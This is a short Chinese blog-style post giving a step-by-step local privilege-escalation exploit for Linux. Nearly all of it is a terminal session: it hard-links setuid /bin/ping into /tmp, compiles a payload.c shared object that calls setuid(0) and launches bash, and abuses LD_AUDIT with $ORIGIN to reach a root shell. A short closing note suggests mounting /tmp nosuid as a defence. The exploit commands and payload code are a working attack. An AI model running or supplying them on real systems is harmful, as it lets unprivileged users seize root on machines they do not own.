linux 利用tmp提权

以一个普通用户登录
[hello@localhost tmp]$ ls -ld /tmp/   因为tmp目录能写文件!!
drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/
[hello@localhost tmp]$ cd /tmp/
[hello@localhost tmp]$ mkdir exploit
[hello@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[hello@localhost tmp]$ exec 3< /tmp/exploit/target     文件描述符,把/tmp/exploit/target定义为文件描述符3
[hello@localhost tmp]$ ls -l /proc/$$/fd/3 
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target
[hello@localhost tmp]$ rm -fr /tmp/exploit/
[hello@localhost tmp]$ ls -l /proc/$$/fd/3 
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
[hello@localhost tmp]$ cat > payload.c       高级系统管理员必须要把c学的很明白!!
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
[hello@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[hello@localhost tmp]$ ls -l /tmp/exploit 
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit
[hello@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3     定义环境变量
[root@localhost tmp]# whoami 
root


--------------
http://marc.info/?l=full-disclosure&m=128739684614072&w=2
-
一般不开777权限目录的.   如果要则
对777的目录做如下操作,可以控制你提权的.比如/tmp
# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp      nosuid 不允许执行suid权限


你可能感兴趣的:(iptables)